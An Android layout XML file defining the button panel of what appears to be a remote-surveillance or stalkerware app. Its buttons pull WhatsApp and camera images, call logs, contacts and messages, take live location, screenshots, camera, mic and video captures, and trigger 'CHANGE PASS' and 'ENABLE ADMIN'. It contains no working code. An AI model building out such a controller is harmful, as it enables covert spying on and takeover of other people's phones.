<?xml version="1.0" encoding="utf-8"?>
<ScrollView xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:orientation="vertical"
    android:scrollbars="vertical"
    tools:context=".MainActivity">


    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:orientation="vertical">


        <Button
            android:id="@+id/folder_whatsapp"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="WHATSAPP IMAGE" />

        <Button
            android:id="@+id/folder_image"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="CAMERA IMAGE" />

        <Button
            android:id="@+id/folder_screenshot"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="SCREENSHOTS" />

        <Button
            android:id="@+id/folder_downloads"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="DOWNLOADS" />
        <!--other     -->

        <Button
            android:id="@+id/send_notification"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="NOTIFICATIOSN" />

        <Button
            android:id="@+id/send_calllogs"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="CALL LOGS" />

        <Button
            android:id="@+id/send_contacts"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="CONTACTS" />

        <Button
            android:id="@+id/send_messages"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="MESSAGES" />




        <!--        liveee -->
        <Button
            android:id="@+id/live_location"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="LOCATION" />

        <Button
            android:id="@+id/live_screenshot"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="TAKE SS" />

        <Button
            android:id="@+id/live_Camera"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="TAKE IMAGE" />


        <Button
            android:id="@+id/live_mic"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="MIC" />


        <Button
            android:id="@+id/live_video"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="TAKE VIDEO" />

        <!--others-->
        <Button
            android:id="@+id/changePass"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="CHANGE PASS" />

        <Button
            android:id="@+id/enableAdmin"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="ENABLE ADMIN" />


    </LinearLayout>
</ScrollView>